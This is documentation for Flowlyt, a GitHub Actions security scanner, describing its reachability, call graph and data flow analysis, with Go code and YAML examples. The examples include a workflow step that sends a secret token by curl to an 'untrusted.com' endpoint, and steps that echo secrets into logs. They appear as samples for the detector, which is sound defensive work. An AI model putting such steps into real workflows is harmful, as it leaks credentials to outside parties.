AST-Based Reachability and Call Graph Analysis

This document describes the new AST-based analysis capabilities in Flowlyt. Reachability analysis and call graph analysis reduce false positives by discarding findings in code that can never run, while still catching issues on reachable code paths.

Overview

The AST-enhanced analysis engine extends Flowlyt's existing hybrid engine with:

- Reachability Analysis - Determines which parts of workflows are actually reachable during execution
- Call Graph Analysis - Builds a graph of dependencies and calls between jobs, steps, and actions
- Data Flow Analysis - Tracks how sensitive data flows through the workflow
- False Positive Reduction - Filters out findings in unreachable code paths

Architecture

Core Components

1. AST Analyzer (`pkg/analysis/ast/ast.go`)

The main orchestrator. It coordinates parsing, call graph construction, reachability analysis, and data flow analysis.

type ASTAnalyzer struct {
    callGraph    *CallGraph
    dataFlow     *DataFlowAnalyzer
    reachability *ReachabilityAnalyzer
}

2. Call Graph (`pkg/analysis/ast/callgraph.go`)

Builds and maintains a graph of workflow components and their relationships.

type CallGraph struct {
    nodes map[string]*CallNode
    edges map[string][]string
}

3. Reachability Analyzer (`pkg/analysis/ast/reachability.go`)

Determines which nodes are reachable from entry points (triggers).

type ReachabilityAnalyzer struct {
    callGraph      *CallGraph
    reachableNodes map[string]bool
    conditions     map[string]*ConditionAnalyzer
}

4. Data Flow Analyzer (`pkg/analysis/ast/dataflow.go`)

Tracks data sources, sinks, and flows to identify potential security issues.

type DataFlowAnalyzer struct {
    sources map[string]*DataSource
    sinks   map[string]*DataSink
    flows   []*DataFlow
}

Key Features

Reachability Analysis

The reachability analyzer determines which parts of a workflow can actually be executed:

- Entry Point Detection: Identifies workflow triggers as entry points
- Dependency Tracking: Follows job dependencies (`needs` relationships)
- Conditional Analysis: Evaluates `if` conditions to determine reachability
- Static Evaluation: Performs static analysis on simple conditions
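Entry point detection and dependency tracking amount to a graph traversal that starts at the triggers. The following is a minimal sketch of that idea, not Flowlyt's actual implementation: the `graph` type, the `reachableFrom` function, and the node IDs are hypothetical names chosen for illustration.

```go
package main

import (
	"fmt"
	"sort"
)

// graph is a hypothetical, simplified stand-in for a call graph:
// it maps a node ID to the IDs of the nodes it leads to.
type graph map[string][]string

// reachableFrom returns the set of nodes reachable from the given
// entry points, using a breadth-first traversal.
func reachableFrom(g graph, entryPoints []string) map[string]bool {
	reachable := make(map[string]bool)
	queue := append([]string(nil), entryPoints...)
	for _, e := range entryPoints {
		reachable[e] = true
	}
	for len(queue) > 0 {
		node := queue[0]
		queue = queue[1:]
		for _, next := range g[node] {
			if !reachable[next] {
				reachable[next] = true
				queue = append(queue, next)
			}
		}
	}
	return reachable
}

func main() {
	g := graph{
		"trigger:push": {"job:build"},
		"job:build":    {"job:deploy"},
		"job:orphan":   {"job:cleanup"}, // no trigger leads here
	}
	reached := reachableFrom(g, []string{"trigger:push"})

	// Sort the IDs so the output is stable across runs.
	ids := make([]string, 0, len(reached))
	for id := range reached {
		ids = append(ids, id)
	}
	sort.Strings(ids)
	fmt.Println(ids) // prints [job:build job:deploy trigger:push]
}
```

Nodes that never appear in the returned set, such as `job:orphan` here, are the candidates for being reported or filtered as unreachable.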

Example of unreachable code detection:

jobs:
  never-runs:
    if: false  # Statically false condition
    runs-on: ubuntu-latest
    steps:
      - run: echo "This will never execute"
        env:
          SECRET: ${{ secrets.API_KEY }}  # A finding here would be a false positive
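
A statically false condition like the one above can be recognized without running the workflow. The sketch below assumes a three-valued result (always true, always false, unknown) and only understands the literals `true` and `false`, optionally wrapped in `${{ }}`. The names `verdict`, `evalCondition`, and `mayRun` are hypothetical and not part of Flowlyt's API.

```go
package main

import (
	"fmt"
	"strings"
)

// verdict is a three-valued result: conditions that depend on runtime
// values cannot be decided statically and stay "unknown".
type verdict int

const (
	unknown verdict = iota
	alwaysTrue
	alwaysFalse
)

func (v verdict) String() string {
	switch v {
	case alwaysTrue:
		return "always true"
	case alwaysFalse:
		return "always false"
	default:
		return "unknown"
	}
}

// evalCondition statically evaluates an `if:` expression.
// Assumption: only literal true/false are handled in this sketch.
func evalCondition(expr string) verdict {
	e := strings.TrimSpace(expr)
	// Strip an optional ${{ ... }} wrapper.
	if strings.HasPrefix(e, "${{") && strings.HasSuffix(e, "}}") {
		e = strings.TrimSpace(e[3 : len(e)-2])
	}
	switch e {
	case "true":
		return alwaysTrue
	case "false":
		return alwaysFalse
	default:
		return unknown
	}
}

// mayRun is conservative: anything not provably false counts as reachable.
func mayRun(expr string) bool {
	return evalCondition(expr) != alwaysFalse
}

func main() {
	conds := []string{"false", "${{ false }}", "true", "github.event_name == 'push'"}
	for _, c := range conds {
		fmt.Printf("%q: %v, mayRun=%t\n", c, evalCondition(c), mayRun(c))
	}
}
```

Treating unknown conditions as reachable keeps the filter conservative: a finding is only dropped when the condition is provably false.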

Call Graph Analysis

Builds a comprehensive graph of workflow components:

Node Types:
- trigger - Workflow triggers (push, pull_request, etc.)
- job - Individual jobs
- step - Steps within jobs
- action - External actions being used
- external_call - Network calls, file operations, etc.

Edge Types:
- Trigger to job relationships
- Job dependency relationships (needs)
- Step execution order
- Action invocations
- External command calls
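
To make the node and edge types concrete, here is a small sketch of how such a graph could be populated. The `nodes` and `edges` fields mirror the `CallGraph` struct shown earlier. Everything else is an assumption made for illustration: the `NodeType` constants, the fields of `CallNode`, the `NewCallGraph`, `AddNode`, and `AddEdge` helpers, and the node ID scheme.

```go
package main

import "fmt"

// NodeType enumerates the node kinds listed above (hypothetical constants).
type NodeType string

const (
	NodeTrigger      NodeType = "trigger"
	NodeJob          NodeType = "job"
	NodeStep         NodeType = "step"
	NodeAction       NodeType = "action"
	NodeExternalCall NodeType = "external_call"
)

// CallNode's fields are assumed; the document does not show them.
type CallNode struct {
	ID   string
	Type NodeType
}

// CallGraph has the same two fields as the struct in the Architecture section.
type CallGraph struct {
	nodes map[string]*CallNode
	edges map[string][]string
}

func NewCallGraph() *CallGraph {
	return &CallGraph{
		nodes: make(map[string]*CallNode),
		edges: make(map[string][]string),
	}
}

// AddNode registers a node, replacing any existing node with the same ID.
func (g *CallGraph) AddNode(id string, t NodeType) {
	g.nodes[id] = &CallNode{ID: id, Type: t}
}

// AddEdge adds a directed edge and rejects endpoints that were never added.
func (g *CallGraph) AddEdge(from, to string) error {
	if _, ok := g.nodes[from]; !ok {
		return fmt.Errorf("unknown source node %q", from)
	}
	if _, ok := g.nodes[to]; !ok {
		return fmt.Errorf("unknown target node %q", to)
	}
	g.edges[from] = append(g.edges[from], to)
	return nil
}

func main() {
	g := NewCallGraph()
	g.AddNode("trigger:push", NodeTrigger)
	g.AddNode("job:build", NodeJob)
	g.AddNode("step:build/0", NodeStep)
	g.AddNode("action:actions/checkout@v4", NodeAction)

	edges := [][2]string{
		{"trigger:push", "job:build"},                  // trigger to job
		{"job:build", "step:build/0"},                  // job to its first step
		{"step:build/0", "action:actions/checkout@v4"}, // action invocation
	}
	for _, e := range edges {
		if err := g.AddEdge(e[0], e[1]); err != nil {
			fmt.Println("error:", err)
			return
		}
	}
	fmt.Println(g.edges["job:build"]) // prints [step:build/0]
}
```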

Data Flow Analysis

Tracks sensitive data movement through workflows:

Data Sources:
- Secrets (${{ secrets.* }})
- GitHub context (${{ github.* }})
- Environment variables
- Action outputs

Data Sinks:
- Network calls (curl, wget)
- File operations
- Logging commands
- Action inputs

Flow Detection:
- Identifies when sensitive data reaches potentially unsafe sinks
- Calculates severity based on data sensitivity and sink risk
- Provides detailed remediation advice
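
As a rough illustration of source-to-sink matching, the sketch below scans a `run` script line by line, looks for `${{ secrets.* }}` references, and checks whether the same line invokes a network or logging command. It is a deliberately simple, line-based approximation and not Flowlyt's analyzer. The `flow` type, the `findFlows` function, the regular expressions, and the `HIGH`/`MEDIUM` severity labels are all assumptions.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

var (
	// Source: a secret reference such as ${{ secrets.TOKEN }}.
	secretRef = regexp.MustCompile(`\$\{\{\s*secrets\.([A-Za-z_][A-Za-z0-9_]*)\s*\}\}`)
	// Sinks: commands that send data over the network or write it to the log.
	networkSink = regexp.MustCompile(`\b(curl|wget)\b`)
	loggingSink = regexp.MustCompile(`\becho\b`)
)

// flow records one secret reaching one sink (hypothetical type).
type flow struct {
	Secret   string
	Sink     string
	Severity string
}

// findFlows reports secrets that appear on the same line as a sink command.
func findFlows(script string) []flow {
	var flows []flow
	for _, line := range strings.Split(script, "\n") {
		matches := secretRef.FindAllStringSubmatch(line, -1)
		if len(matches) == 0 {
			continue
		}
		var sink, severity string
		switch {
		case networkSink.MatchString(line):
			sink, severity = "network", "HIGH" // assumed severity mapping
		case loggingSink.MatchString(line):
			sink, severity = "logging", "MEDIUM"
		default:
			continue // secret used, but no known sink on this line
		}
		for _, m := range matches {
			flows = append(flows, flow{Secret: m[1], Sink: sink, Severity: severity})
		}
	}
	return flows
}

func main() {
	script := `echo "starting"
curl -H "Auth: ${{ secrets.TOKEN }}" https://untrusted.com/api
echo ${{ secrets.API_KEY }}`
	for _, f := range findFlows(script) {
		fmt.Printf("%s -> %s (%s)\n", f.Secret, f.Sink, f.Severity)
	}
}
```

A real analyzer would also need to follow secrets through environment variables and step outputs, which this per-line check does not attempt.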

Usage

Basic Usage

import (
    "context"
    "fmt"
    "log"

    "github.com/harekrishnarai/flowlyt/pkg/engine"
    "github.com/harekrishnarai/flowlyt/pkg/parser"
)

// Create enhanced engine with AST analysis
config := engine.DefaultASTEnhancedConfig()
config.EnableReachabilityAnalysis = true
config.EnableDataFlowAnalysis = true
config.FilterUnreachableFindings = true

enhancedEngine, err := engine.NewASTEnhancedEngine(config)
if err != nil {
    log.Fatal(err)
}

// Analyze workflows (workflowContent is assumed to hold the file contents, loaded elsewhere)
workflowFiles := []parser.WorkflowFile{
    {Path: ".github/workflows/ci.yml", Content: workflowContent},
}

result, err := enhancedEngine.AnalyzeWithAST(context.Background(), workflowFiles)
if err != nil {
    log.Fatal(err)
}

// Access enhanced results
fmt.Printf("Reachable nodes: %d\n", result.ReachabilityReport.ReachableNodes)
fmt.Printf("Data flow findings: %d\n", len(result.DataFlowFindings))
fmt.Printf("Filtered findings: %d\n", result.FilteredFindings)

Configuration Options

type ASTEnhancedConfig struct {
    EnableReachabilityAnalysis bool   // Enable reachability analysis
    EnableDataFlowAnalysis     bool   // Enable data flow tracking
    EnableCallGraphAnalysis    bool   // Enable call graph construction
    FilterUnreachableFindings  bool   // Filter findings in unreachable code
    MinDataFlowSeverity        string // Minimum severity for data flow findings
    ReachabilityConfig         ReachabilityConfig
}

type ReachabilityConfig struct {
    AnalyzeConditionals     bool // Analyze conditional expressions
    StaticEvaluation        bool // Perform static evaluation of conditions
    MarkUnreachableFindings bool // Mark unreachable findings instead of filtering
    ReportUnreachableCode   bool // Include unreachable code in reports
}

Benefits

1. Reduced False Positives

By filtering out findings in unreachable code paths, the analysis becomes more precise:

jobs:
  security-scan:
    if: github.event_name == 'never'  # Will never be true
    runs-on: ubuntu-latest
    steps:
      - run: echo ${{ secrets.API_KEY }}  # Finding filtered out as unreachable
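
The filtering step itself can be sketched as a pass over the findings using the reachable set. The `finding` type and `applyReachability` function below are hypothetical. The `markOnly` flag is an assumption about how an option like `MarkUnreachableFindings` might behave: keep the finding but flag it, instead of dropping it.

```go
package main

import "fmt"

// finding is a hypothetical, minimal finding tied to a call graph node.
type finding struct {
	RuleID      string
	NodeID      string
	Unreachable bool
}

// applyReachability drops findings located in unreachable nodes, or, when
// markOnly is set, keeps them with Unreachable set to true. It returns the
// resulting findings and the number of findings that were in unreachable code.
func applyReachability(findings []finding, reachable map[string]bool, markOnly bool) ([]finding, int) {
	kept := make([]finding, 0, len(findings))
	affected := 0
	for _, f := range findings {
		if reachable[f.NodeID] {
			kept = append(kept, f)
			continue
		}
		affected++
		if markOnly {
			f.Unreachable = true
			kept = append(kept, f)
		}
	}
	return kept, affected
}

func main() {
	findings := []finding{
		{RuleID: "SECRET_EXPOSURE", NodeID: "job:security-scan"},
		{RuleID: "SECRET_EXPOSURE", NodeID: "job:build"},
	}
	reachable := map[string]bool{"job:build": true}

	kept, filtered := applyReachability(findings, reachable, false)
	fmt.Println(len(kept), filtered) // prints 1 1
}
```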

2. Enhanced Detection

Data flow analysis catches complex security issues:

steps:
  - name: Get API data
    run: |
      # Data flow analysis detects secret exposure via network
      curl -H "Auth: ${{ secrets.TOKEN }}" https://untrusted.com/api

3. Context Awareness

Understanding job dependencies and execution flow:

jobs:
  build:
    runs-on: ubuntu-latest
    outputs:
      version: ${{ steps.version.outputs.version }}
    steps:
      - id: version
        run: echo "version=1.0.0" >> "$GITHUB_OUTPUT"

  deploy:
    needs: build
    runs-on: ubuntu-latest
    steps:
      - run: |
          # Analysis understands this depends on build job output
          echo "Deploying version ${{ needs.build.outputs.version }}"
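
One way to reason about `needs` relationships is to order jobs so that every job comes after the jobs it depends on. The sketch below does this with Kahn's topological sort. It is an illustration under assumptions, not Flowlyt's code: `executionOrder` and the shape of the `needs` map are hypothetical.

```go
package main

import (
	"errors"
	"fmt"
	"sort"
)

// executionOrder takes a map from job name to the jobs it needs and returns
// an order in which every job appears after its dependencies. It fails on
// references to unknown jobs and on dependency cycles.
func executionOrder(needs map[string][]string) ([]string, error) {
	indegree := make(map[string]int, len(needs))
	dependents := make(map[string][]string)
	for job, deps := range needs {
		indegree[job] = len(deps)
		for _, dep := range deps {
			if _, ok := needs[dep]; !ok {
				return nil, fmt.Errorf("job %q needs unknown job %q", job, dep)
			}
			dependents[dep] = append(dependents[dep], job)
		}
	}

	// Start with jobs that have no dependencies; sort for a stable result.
	var ready []string
	for job, n := range indegree {
		if n == 0 {
			ready = append(ready, job)
		}
	}
	sort.Strings(ready)

	var order []string
	for len(ready) > 0 {
		job := ready[0]
		ready = ready[1:]
		order = append(order, job)

		next := dependents[job]
		sort.Strings(next)
		for _, d := range next {
			indegree[d]--
			if indegree[d] == 0 {
				ready = append(ready, d)
			}
		}
	}
	if len(order) != len(needs) {
		return nil, errors.New("dependency cycle detected in needs")
	}
	return order, nil
}

func main() {
	order, err := executionOrder(map[string][]string{
		"build":  nil,
		"deploy": {"build"},
	})
	if err != nil {
		fmt.Println("error:", err)
		return
	}
	fmt.Println(order) // prints [build deploy]
}
```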

Security Rules Enhanced

The AST analysis enhances existing security rules and adds new categories:

New Rule Categories

- CategoryReachability - Issues related to unreachable code
- CategoryDataFlow - Data flow security violations
- CategoryCallGraph - Issues detected through call graph analysis

Enhanced Detection

- Secret Exposure: Tracks secret usage from source to potential leak points
- Privilege Escalation: Analyzes permission flows and escalation paths
- Supply Chain: Maps action dependencies and external calls
- Data Exfiltration: Detects sensitive data sent to external endpoints

Performance Considerations

The AST analysis adds computational overhead but provides significant security benefits:

- Parsing: ~10-20ms per workflow file
- Call Graph: ~5-10ms per workflow
- Reachability: ~10-30ms depending on complexity
- Data Flow: ~20-50ms depending on sources/sinks

Adding these ranges gives roughly 45-110ms, so total overhead is typically 50-100ms per workflow, which is acceptable for most use cases.

Limitations

- Dynamic Conditions: Cannot analyze conditions that depend on runtime values
- Complex Expressions: Limited static evaluation of complex conditional logic
- Cross-Workflow: Currently analyzes workflows in isolation
- Action Internals: Cannot see inside third-party actions

Future Enhancements

- Cross-Workflow Analysis: Track dependencies between workflows
- Dynamic Analysis: Integrate with runtime information
- Action Scanning: Deep analysis of popular GitHub Actions
- Machine Learning: Use ML to improve condition analysis
- Performance Optimization: Caching and incremental analysis

Integration with Existing Rules

The AST analysis works alongside existing pattern-based rules:

- Pattern Rules: Continue to work for basic detection
- AST Enhancement: Provides additional context and filtering
- Combined Results: Merges findings from both approaches
- Confidence Scoring: AST analysis can increase confidence in findings

This creates a layered security approach that combines the speed of pattern matching with the precision of AST analysis.
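
Merging the two result sets and adjusting confidence could look roughly like the following. This is a sketch under stated assumptions: the `finding` type, the `mergeFindings` function, the 0-100 confidence scale, and the fixed bonus of 20 for findings confirmed by both approaches are all hypothetical.

```go
package main

import "fmt"

// finding is a hypothetical finding with a confidence score from 0 to 100.
type finding struct {
	RuleID     string
	Location   string
	Confidence int
}

// mergeFindings combines pattern-based and AST-based findings. Findings are
// deduplicated by rule and location. A pattern finding that the AST analysis
// also reports gets the higher of the two scores plus a bonus, capped at 100.
func mergeFindings(pattern, ast []finding) []finding {
	type key struct{ rule, loc string }
	index := make(map[key]int)
	var merged []finding

	for _, f := range pattern {
		k := key{f.RuleID, f.Location}
		if _, seen := index[k]; seen {
			continue
		}
		index[k] = len(merged)
		merged = append(merged, f)
	}
	patternCount := len(merged) // entries below this index came from pattern rules
	confirmed := make(map[key]bool)

	for _, f := range ast {
		k := key{f.RuleID, f.Location}
		i, seen := index[k]
		if !seen {
			index[k] = len(merged)
			merged = append(merged, f)
			continue
		}
		if i < patternCount && !confirmed[k] {
			confirmed[k] = true
			c := merged[i].Confidence
			if f.Confidence > c {
				c = f.Confidence
			}
			c += 20 // assumed bonus for agreement between both approaches
			if c > 100 {
				c = 100
			}
			merged[i].Confidence = c
		}
	}
	return merged
}

func main() {
	pattern := []finding{{"SECRET_EXPOSURE", "ci.yml:build", 60}}
	ast := []finding{
		{"SECRET_EXPOSURE", "ci.yml:build", 70},
		{"DATA_EXFILTRATION", "ci.yml:deploy", 50},
	}
	for _, f := range mergeFindings(pattern, ast) {
		fmt.Printf("%s at %s: %d\n", f.RuleID, f.Location, f.Confidence)
	}
}
```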
